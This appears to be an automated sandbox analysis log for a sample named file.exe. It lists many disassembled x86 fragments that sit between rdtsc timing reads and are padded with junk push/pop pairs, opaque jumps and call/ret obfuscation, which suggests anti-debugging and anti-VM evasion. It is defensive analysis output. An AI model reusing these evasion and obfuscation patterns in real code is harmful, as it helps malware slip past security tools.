Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BD5B1 second address: 11BD5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F3FAC75ECCFh 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jns 00007F3FAC75ECD2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 jmp 00007F3FAC75ECCDh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD5F0 second address: 11BD5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD5F4 second address: 11BD60C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FAC75ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 je 00007F3FAC75ECCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBDF3 second address: 11DBE29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3FACB96B36h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F3FACB96B28h 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBFF6 second address: 11DBFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBFFC second address: 11DC00E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACB96B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC814 second address: 11DC83B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jmp 00007F3FAC75ECD5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop ebx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DC9C8 second address: 11DCA12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3FACB96B2Bh 0x00000008 jg 00007F3FACB96B26h 0x0000000e pop edi 0x0000000f jnc 00007F3FACB96B33h 0x00000015 jmp 00007F3FACB96B2Dh 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F3FACB96B2Eh 0x00000022 jmp 00007F3FACB96B2Eh 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCB84 second address: 11DCB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCB8A second address: 11DCB90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE2E second address: 11DCE32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE32 second address: 11DCE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE38 second address: 11DCE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE3E second address: 11DCE52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F3FACB96B26h 0x0000000e jp 00007F3FACB96B26h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE52 second address: 11DCE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC75ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCE72 second address: 11DCE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3FACB96B2Bh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DCFEC second address: 11DD003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC75ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD003 second address: 11DD023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD023 second address: 11DD02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3FAC813906h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD780 second address: 11DD7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F3FACCA44C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD7A3 second address: 11DD7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD922 second address: 11DD941 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3FACCA44C5h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDAA2 second address: 11DDAA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDAA7 second address: 11DDAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACCA44B6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC3F second address: 11DDC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC813910h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC54 second address: 11DDC5E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3FACCA44BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC5E second address: 11DDC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDC66 second address: 11DDC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E0A16 second address: 11E0A37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3FAC813916h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4486 second address: 11B448C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B448C second address: 11B4490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4490 second address: 11B4494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4494 second address: 11B449A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B449A second address: 11B44CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FACCA44C7h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3FACCA44C7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B44CE second address: 11B44D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B44D2 second address: 11B4520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F3FACCA44CCh 0x00000012 jmp 00007F3FACCA44C6h 0x00000017 jmp 00007F3FACCA44C0h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4520 second address: 11B4526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E7FE4 second address: 11E7FF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8162 second address: 11E8166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E82FC second address: 11E830A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E830A second address: 11E8315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8315 second address: 11E831B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBB0 second address: 11ECBB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBB6 second address: 11ECC05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 447795CAh 0x00000010 jp 00007F3FACCA44CFh 0x00000016 call 00007F3FACCA44B9h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3FACCA44BBh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC05 second address: 11ECC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3FAC813906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECC0F second address: 11ECC21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3FACCA44BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED0AB second address: 11ED0B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED0B0 second address: 11ED0C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3FACCA44B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED7DD second address: 11ED7E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ED8BF second address: 11ED8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB1F second address: 11EDB29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3FAC813906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB29 second address: 11EDB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F3FACCA44B6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDCF3 second address: 11EDCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDD73 second address: 11EDD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDD77 second address: 11EDDAE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3FAC813906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3FAC813908h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDDAE second address: 11EDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE200 second address: 11EE206 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE206 second address: 11EE220 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3FACCA44BEh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE220 second address: 11EE229 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE229 second address: 11EE2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F3FACCA44B8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 jc 00007F3FACCA44CBh 0x00000027 call 00007F3FACCA44BEh 0x0000002c mov esi, dword ptr [ebp+122D1AB1h] 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D29CFh], edi 0x0000003d and ebx, dword ptr [ebp+122D2C80h] 0x00000043 popad 0x00000044 pop edi 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F3FACCA44B8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 0000001Bh 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 xchg eax, ebx 0x00000062 pushad 0x00000063 pushad 0x00000064 jmp 00007F3FACCA44C7h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE2BA second address: 11EE2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3FAC813919h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F090C second address: 11F0916 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0916 second address: 11F0987 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3FAC813916h 0x00000008 jmp 00007F3FAC813910h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov si, 0A68h 0x00000014 and esi, 17F8A500h 0x0000001a push 00000000h 0x0000001c mov si, C176h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F3FAC813908h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c and esi, 722E8BFBh 0x00000042 call 00007F3FAC813911h 0x00000047 mov edi, dword ptr [ebp+122D2CB4h] 0x0000004d pop esi 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0987 second address: 11F098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F098B second address: 11F098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F098F second address: 11F0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F0995 second address: 11F099F instructions: 0x00000000 rdtsc 0x00000002 je 00007F3FAC81390Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1507 second address: 11F1565 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c mov si, 9463h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F3FACCA44B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F3FACCA44B8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 stc 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1565 second address: 11F1569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1569 second address: 11F1580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACCA44C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1580 second address: 11F15BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC813914h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F3FAC81391Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F15BA second address: 11F15C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2014 second address: 11F2018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2018 second address: 11F201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DE4 second address: 11F1DEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F201C second address: 11F2022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DEA second address: 11F1DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DF0 second address: 11F1E07 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F3FACCA44C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F34C1 second address: 11F34E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FAC81390Ch 0x00000008 jnl 00007F3FAC813906h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3FAC813915h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F61BF second address: 11F61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7169 second address: 11F716D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F716D second address: 11F71EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACCA44C1h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f jg 00007F3FACCA44BCh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F3FACCA44B8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D28D3h], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F3FACCA44B8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jnp 00007F3FACCA44B6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9312 second address: 11F9317 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
